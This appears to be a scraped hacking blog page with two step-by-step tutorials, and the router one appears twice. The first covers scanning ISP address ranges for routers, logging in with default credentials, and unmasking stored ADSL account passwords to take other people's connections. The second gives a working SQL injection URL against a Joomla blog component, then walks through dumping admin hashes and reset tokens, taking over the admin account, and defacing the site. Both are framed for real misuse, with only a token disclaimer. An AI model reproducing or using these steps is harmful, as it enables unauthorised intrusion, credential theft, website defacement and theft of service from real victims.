3. But second point doesn't matter much so try to use better encryption method i.e. WAP to password protect your wireless Network.
Labels:
Hacking,
Hacking Tools,
How Tos,
WiFi Hacking
HOW TO HACK ADSL ROUTERS - COMPLETE TUTORIAL
Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.
First we will download the necessary tools:
1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here:JAVA
You will also need to have version 8 OR older of Internet Explorer.
Ok so let's start with getting the job done:
1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.
2.) Open Angry IP scanner it will look like this:
![[Image: pic1hr.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u5GA_GXjsDmKMgUfQAHUqrUfIq-p2lXvSb-oicY_YzK48PFj4WoXz0rVfwMGWCKof7Kf5O96Lu_bjFqe9uQH_jep4ROdK92O1H_X_a7cjwX0g=s0-d)
Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0
And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:
67.140.150.254
And before we click scan we need to set some options so it only shows us alive hosts:
Click Tools and then click preferences:
![[Image: pic2q.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sKGvw5iA7BYiwUD-SobtkL2VI302dvoL71spofF9AdOMl7GC_t5jo3YZv3o9H7kotqjhezkvyNFyBjtRPHEor2UyEXnuWX3lepDRnnK4W7hwv9Spk=s0-d)
Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:
![[Image: pic3hi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ujOZVQ_fU3HSQvvCu9MLMe4XhlKFlEn2peAaD07uJZDy7w6n1dXSQecVDqcmvqvc0FCtARbc2_lU_JcLLtn44qMQafsd6FKsNGbsrx3SYJXyfu=s0-d)
And on the display tab choose "Hosts with open ports only":
![[Image: pic4e.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uSNEeH1mrcGvZBkl0yrqBvSAbAKK83Ynh2bnm2wDdbhz4DKkXr75t8OGNQ535kH1DpaNyUC9Y5GKgFruF7Td8IK1jtKO0IIxVFwKMx1IW2wwo8Rvg=s0-d)
Then click OK to save the preferences and click start:
![[Image: pic5f.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tpVDbsJeQN11JxHdhy5hG8EtMTIiDN-vV9b6iPNzgnO8NK02epV-C3ejuOJJk-R5xgrTZLWAoG4EJJLfzK1bT_vAjFyIixFeN5UU2DIcK5zlDVPA=s0-d)
After few seconds or minutes you should see your first IP addresses:
![[Image: pic6c.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uj-nk7g2n2MxMe4GdFQSE4tGlqqNETRKHsBjxVmwDUd3f20fzGa3l9Jo7tER6MBoEAyfUNfvXBQggLAF01L2UoM2holZc3SQQ3jOTH-W9woE4s7VM=s0-d)
Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!
It will ask you for a login credentials:
![[Image: pic7kh.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tyzRFa85g1YerRKuF-SvTspFgAWBg9hDb_P82n1gQ2N5TlvElCEa7qtvsct7MDREiOKHdWW84Ld0eSPerQusFrsLTKES3n-rsFCCH_jbyva8tYig=s0-d)
Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:
![[Image: pic8.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_teVa-NSwPDr84-05rb9LSBbf2KlIfTMnGZk4OZgfF48tz6PVH9rgCrJ8TrWVvx6bOoc1UKk4wVrHMs5ANvaLsU9M4VMiWSiGBV41xDSafEMjjqBg=s0-d)
Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.
So why did we use Internet Explorer for this??
Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.
And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:
![[Image: pic9v.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vj1VPJvLCCXJ1M1Y0CSsBCou-1csAUhld8xlaFRQldAvRW55thu3iez83FxSbcKOFFKo-WtrYGDqteKt9QKz3t_qvYvK25RGQeMEBrjaoY51Xp9bw=s0-d)
And password in this case is: 854179
Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.
First we will download the necessary tools:
1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here:JAVA
You will also need to have version 8 OR older of Internet Explorer.
Ok so let's start with getting the job done:
1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.
2.) Open Angry IP scanner it will look like this:
Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0
And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:
67.140.150.254
And before we click scan we need to set some options so it only shows us alive hosts:
Click Tools and then click preferences:
Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:
And on the display tab choose "Hosts with open ports only":
Then click OK to save the preferences and click start:
After few seconds or minutes you should see your first IP addresses:
Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!
It will ask you for a login credentials:
Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:
Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.
So why did we use Internet Explorer for this??
Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.
And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:
And password in this case is: 854179
Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.
Labels:
ADSL Hacking,
Hacking,
Hacking Tools,
How Tos
HOW TO HACK JOOMLA CMS WEBSITE - COMPLETE TUTORIAL
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge
DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.
NOTE:
USE ANONYMOUS PROXY!!!
Introduction
Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!
We hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!
Finding Exploit And Target
Those two steps could go in different order, depend what you find first target or exploit...
Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages
At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+from+jos_users--
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22Site load normally...
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62Site content blog Profile Admin
Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62and click on Inject
Follow standard steps until you find Column Name, as a result we have
Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
Code:
http://www.site.com/index.php?option=com_user&view=resetThis is standard Joomla! query for password reset request
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users
username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.
If you done everything ok, Rest your Password page will load. Enter your new password...
After that go to:
Code:
http://www.site.com/administrator/Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail
Labels:
Hacking,
Hacking Tools,
How Tos,
Website Hacking
Subscribe to:
Posts (Atom)